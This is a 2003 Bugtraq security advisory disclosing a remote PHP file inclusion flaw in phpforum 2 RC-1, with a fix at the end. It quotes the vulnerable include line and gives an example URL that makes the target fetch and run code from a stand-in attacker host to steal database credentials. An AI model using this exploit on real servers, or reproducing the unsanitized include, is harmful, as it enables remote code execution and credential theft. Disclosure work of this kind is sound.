[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030710165609.D585937F1C@www.fastmail.fm>
Date: Thu, 10 Jul 2003 08:56:09 -0800
From: "theblacksheep" <theblacksheep@...tmail.fm>
To: bugtraq@...urityfocus.com
Subject: PHP-Include-Hack-Possibility in phpforum 2 RC-1
================================================
<------------------------------------------------>
<------------#www.bright-shadows.net#------------>
<------------------------------------------------>
<--------------#theblacksheep&erik#-------------->
<------------------------------------------------>
================================================
Advisory Information
--------------------
Advisory Name : PHP-Include-Hack-Possibility in phpforum 2 RC-1
Author : Marc Bromm <theblacksheep@...tmail.fm> Germany
Discover by : Marc Bromm <theblacksheep@...tmail.fm> Germany
Release Date : 10. Juli 2003
Application : phpforum 2 RC-1
Vendor Homepage : http://www.phpmyforum.de/
Vendor Status : notified
Vulnerable Versions: phpforum 2 RC-1 (maybe older)
Platforms : OS Independent, PHP
Severity : High
######Overview:
The phpforum is a mySQL based forum with a lot of functions.
######Exploit:
1. Exploitable file
The exploitable file is the "mainfile.php". The first 2 lines are:
----------------------------------------
<?php
include("$MAIN_PATH/config.php"); //Konfiguration
----------------------------------------
So it is possible to set $MAIN_PATH to everything.
For example:
-> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com
Then you need only a "config.php" file with the code you like to execute.
So you can get for example the SQL server password and the username which
are stored in the "config.inc.php" file.
But it is necessary that the attacking webserver (evilhost) can't be
running PHP
or the code will be run on the attacking machine rather than the target
machine.
######Solution:
Change
-----------------------------------
include("$MAIN_PATH/config.php"); //Konfiguration
-----------------------------------
to
-----------------------------------
include("config.php"); //Konfiguration
-----------------------------------
cause the config file is in the same folder as the mainfile.
Greetz to:
Erik, (O_o)oOoOoOo.
--
theblacksheep@...tmail.fm
--
http://www.fastmail.fm - mmm... Fastmail...
Powered by blists - more mailing lists